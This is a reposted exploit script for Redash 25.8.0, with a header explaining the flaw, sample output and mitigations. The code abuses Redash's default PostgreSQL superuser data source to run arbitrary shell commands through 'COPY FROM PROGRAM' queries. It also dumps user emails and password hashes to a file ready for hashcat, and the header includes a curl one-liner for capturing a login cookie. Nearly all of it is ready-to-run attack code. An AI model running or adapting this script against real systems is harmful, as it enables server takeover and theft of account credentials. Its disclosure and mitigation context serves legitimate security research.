Redash Authenticated Remote Command Execution
Redash Authenticated Remote Command Execution
Redash Authenticated Remote Command Execution

#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
# Redash Authenticated Remote Command Execution

#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
# redash_rce_hash.py
#
# Redash Authenticated Remote Command Execution
#
# Jeremy Brown (jbrown3264/gmail), Dec 2025
#
# =Intro=
#
# Redash's default configuration uses PostgreSQL superuser credentials for data source
# connections. When combined with Redash's intended SQL query execution capability,
# this enables authenticated users to:
#
# 1. Execute arbitrary system commands on the database server via PostgreSQL's
# COPY FROM PROGRAM command
# 2. Extract password hashes from Redash's internal users table via direct SQL queries
#
# The security issue comes from default configuration:
# - Redash's default setup uses PostgreSQL superuser credentials for data sources
# - This grants high privileges to user-submitted queries
# - Combined with lack of database isolation, users can access Redash's auth tables
#
# The vulnerability requires:
# - Authenticated user account on Redash
# - Instance configuration with the default PostgreSQL data source (superuser by default)
#
# Repo and Version Tested
# - https://github.com/getredash/redash
# - redash/redash:25.8.0 (docker image)
#
# =Usage=
#
# redash_rce_hash.py <url> <cookie_file> [--cmd <command> | --dump]
#
# Example: redash_rce_hash.py http://localhost:5000 cookie.txt --cmd "id"
# Example: redash_rce_hash.py http://localhost:5000 cookie.txt --dump
#
# Get cookie from command line (requires user:pass in creds.txt):
# $ IFS=: read user pass < creds.txt; curl -sk -c cookie.txt -b cookie.txt -X POST \
# http://localhost:5000/login \
# -d "email=$user&password=$pass&csrf_token=$(curl -s -c cookie.txt http://localhost:5000/login \
# | grep -oP '(?<=name=\"csrf_token\" value=\")[^\"]*')" >/dev/null 2>&1
#
# =Testing=
#
# $ docker ps | grep redash
# redash/nginx:latest 0.0.0.0:80->80/tcp, [::]:80->80/tcp redash-nginx-1
# redash/redash:25.8.0 5000/tcp redash-adhoc_worker-1
# redash/redash:25.8.0 5000/tcp redash-scheduler-1
# redash/redash:25.8.0 5000/tcp redash-scheduled_worker-1
# redash/redash:25.8.0 5000/tcp redash-worker-1
# redash/redash:25.8.0 0.0.0.0:5000->5000/tcp, [::]:5000->5000/tcp redash-server-1
# pgautoupgrade/pgautoupgrade:17-alpine 5432/tcp redash-postgres-1
# redis:7-alpine 6379/tcp redash-redis-1
#
# $ ./redash_rce_hash.py http://localhost:5000 cookie.txt --cmd "ps"
# [*] Executing command: ps
#
# PID USER TIME COMMAND
# 1 root 0:00 bash /usr/local/bin/docker-entrypoint.sh postgres
# 9 postgres 0:00 postgres
# 31 postgres 0:00 postgres: checkpointer
# 32 postgres 0:00 postgres: background writer
# 34 postgres 0:00 postgres: walwriter
# 35 postgres 0:00 postgres: autovacuum launcher
# 36 postgres 0:00 postgres: logical replication launcher
# 101 postgres 0:00 postgres: postgres postgres 172.18.0.5(52788) idle
# .....
# 324 postgres 0:00 postgres: postgres postgres 172.18.0.6(54688) COPY
# 325 postgres 0:00 postgres: postgres postgres 172.18.0.4(41116) authentication
# 326 postgres 0:00 ps
#
# =Mitigation=
#
# Maintainers were responsive and decided not to make code changes as they view
# it as a configuration issue rather than product vulnerability, as more secure
# database configuration (vs default) may prevent exploitation.
#
# This may be mitigated by:
# - Using non-superuser database credentials for data sources
# - Revoking access to sensitive columns (e.g. password_hash) via column-level permissions
# - Isolating Redash's internal database from user-accessible data sources
#

import sys
import time
import hashlib
import requests
from http.cookiejar import MozillaCookieJar
from urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

def load_cookies(path):
jar = MozillaCookieJar()
jar.load(path, ignore_discard=True, ignore_expires=True)
return {c.name: c.value for c in jar}

def normalize_url(url):
url = url.rstrip('/')

if url.startswith('http://') or url.startswith('https://'):
return url

for protocol in ['https://', 'http://']:
test_url = f"{protocol}{url}"
try:
resp = requests.head(test_url, verify=False, timeout=3)
return test_url
except:
pass

return f"http://{url}"

def find_api_path(base_url, cookies):
session = requests.Session()
session.cookies.update(cookies)

paths = [
"/api/query_results",
"/default/api/query_results",
"/org/api/query_results",
]

for path in paths:
url = f"{base_url}{path}"
try:
resp = session.post(url, json={"query": "SELECT 1", "data_source_id": 1, "parameters": {}}, verify=False, timeout=5)
if resp.status_code in [200, 400]:
return path
except:
pass

return paths[0]

def execute_rce(base_url, cookies, command):
session = requests.Session()
session.cookies.update(cookies)

api_path = find_api_path(base_url, cookies)
endpoint = f"{base_url}{api_path}"

table = f"rce_{hashlib.md5(command.encode()).hexdigest()[:8]}"

payload = {
"query": f"CREATE UNLOGGED TABLE IF NOT EXISTS {table} AS SELECT '1' WHERE 1=0; COPY {table} FROM PROGRAM '{command}'; SELECT * FROM {table}",
"data_source_id": 1,
"parameters": {}
}

resp = session.post(endpoint, json=payload, verify=False, timeout=30)

if resp.status_code != 200:
raise RuntimeError(f"Query submission failed: HTTP {resp.status_code} - check credentials / session expiration")

result = resp.json()

# Handle synchronous response
if 'query_result' in result:
rows = result['query_result']['data']['rows']
return [row.get('?column?', '') for row in rows if row.get('?column?')]

# Handle asynchronous response (poll job)
job_id = result.get('job', {}).get('id')
if not job_id:
raise RuntimeError(f"Failed to submit query: {result}")

# Poll for completion
deadline = time.time() + 60
while time.time() < deadline:
job_url = f"{base_url}/api/jobs/{job_id}"
job_resp = session.get(job_url, verify=False, timeout=15)

if job_resp.status_code != 200:
raise RuntimeError(f"Failed to poll job: HTTP {job_resp.status_code}")

job = job_resp.json().get('job', {})

if job.get('status') == 3: # Complete
result_id = job.get('query_result_id')
for res_path in [f"/api/query_results/{result_id}", f"/default/api/query_results/{result_id}"]:
try:
url = f"{base_url}{res_path}"
res = session.get(url, verify=False, timeout=30)
if res.status_code == 200:
rows = res.json()['query_result']['data']['rows']
return [row.get('?column?', '') for row in rows if row.get('?column?')]
except:
pass
raise RuntimeError("Could not fetch query results")

if job.get('status') == 4: # Failed
raise RuntimeError(f"Job failed: {job.get('error')}")

time.sleep(0.5)

raise TimeoutError("Job did not complete")

def extract_password_hashes(base_url, cookies):
session = requests.Session()
session.cookies.update(cookies)

api_path = find_api_path(base_url, cookies)
endpoint = f"{base_url}{api_path}"

# SQL injection payload to extract email and password hash
payload = {
"query": "SELECT email, password_hash FROM users",
"data_source_id": 1,
"parameters": {}
}

resp = session.post(endpoint, json=payload, verify=False, timeout=30)

if resp.status_code != 200:
raise RuntimeError(f"Query submission failed: HTTP {resp.status_code} - check credentials / session expiration")

result = resp.json()

# Handle synchronous response
if 'query_result' in result:
rows = result['query_result']['data']['rows']
hash_list = []
for row in rows:
email = row.get('email') or ''
password_hash = row.get('password_hash') or ''
if password_hash and password_hash.startswith('$') and email:
hash_list.append((email, password_hash))
return hash_list

# Handle asynchronous response (poll job)
job_id = result.get('job', {}).get('id')
if not job_id:
raise RuntimeError(f"Failed to submit query: {result}")

# Poll for completion
deadline = time.time() + 60
while time.time() < deadline:
job_url = f"{base_url}/api/jobs/{job_id}"
job_resp = session.get(job_url, verify=False, timeout=15)

if job_resp.status_code != 200:
raise RuntimeError(f"Failed to poll job: HTTP {job_resp.status_code}")

job = job_resp.json().get('job', {})

if job.get('status') == 3: # Complete
result_id = job.get('query_result_id')
for res_path in [f"/api/query_results/{result_id}", f"/default/api/query_results/{result_id}"]:
try:
url = f"{base_url}{res_path}"
res = session.get(url, verify=False, timeout=30)
if res.status_code == 200:
rows = res.json()['query_result']['data']['rows']
hash_list = []
for row in rows:
email = row.get('email') or ''
password_hash = row.get('password_hash') or ''
if password_hash and password_hash.startswith('$') and email:
hash_list.append((email, password_hash))
return hash_list
except:
pass
raise RuntimeError("Could not fetch query results")

if job.get('status') == 4: # Failed
raise RuntimeError(f"Job failed: {job.get('error')}")

time.sleep(0.5)

raise TimeoutError("Job did not complete")

def main():
if len(sys.argv) < 3:
print(f"Usage: {sys.argv[0]} <url> <cookie_file> [--cmd <command> | --dump]", file=sys.stderr)
print(f"", file=sys.stderr)
print(f"Examples:", file=sys.stderr)
print(f" {sys.argv[0]} http://localhost:5000 cookie.txt --cmd 'id'", file=sys.stderr)
print(f" {sys.argv[0]} http://localhost:5000 cookie.txt --dump", file=sys.stderr)
sys.exit(1)

url, cookie_file = sys.argv[1], sys.argv[2]

# Determine mode (default: --dump)
mode = "--dump"
command = None

if len(sys.argv) > 3:
if sys.argv[3] == "--cmd":
mode = "--cmd"
if len(sys.argv) < 5:
print("Error: --cmd requires a command argument", file=sys.stderr)
sys.exit(1)
command = sys.argv[4]
elif sys.argv[3] == "--dump":
mode = "--dump"
else:
print(f"Error: Unknown option {sys.argv[3]}", file=sys.stderr)
sys.exit(1)

try:
url = normalize_url(url)
cookies = load_cookies(cookie_file)

if mode == "--cmd":
print(f"[*] Executing command: {command}\n", file=sys.stderr)
output = execute_rce(url, cookies, command)
for line in output:
print(line)
else: # --dump
print(f"[*] Extracting password hashes...", file=sys.stderr)
hash_list = extract_password_hashes(url, cookies)
print(f"[*] Found {len(hash_list)} password hashes\n", file=sys.stderr)

if not hash_list:
print("No password hashes found", file=sys.stderr)
sys.exit(1)

# Output format: email on one line, hash on next line
# Also write just hashes to hashes.txt for hashcat
with open('hashes.txt', 'w') as hash_file:
for email, password_hash in hash_list:
print(email)
print(password_hash + "\n")
hash_file.write(password_hash + '\n')

print(f"[*] Hashes written to hashes.txt", file=sys.stderr)

except Exception as e:
print(f"Error: {e}", file=sys.stderr)
sys.exit(1)

if __name__ == "__main__":
main()
Social Media Share
About Contact Terms of Use Privacy Policy
© Khalil Shreateh — Cybersecurity Researcher & White-Hat Hacker — Palestine 🇵🇸
All content is for educational purposes only. Unauthorized use of any information on this site is strictly prohibited.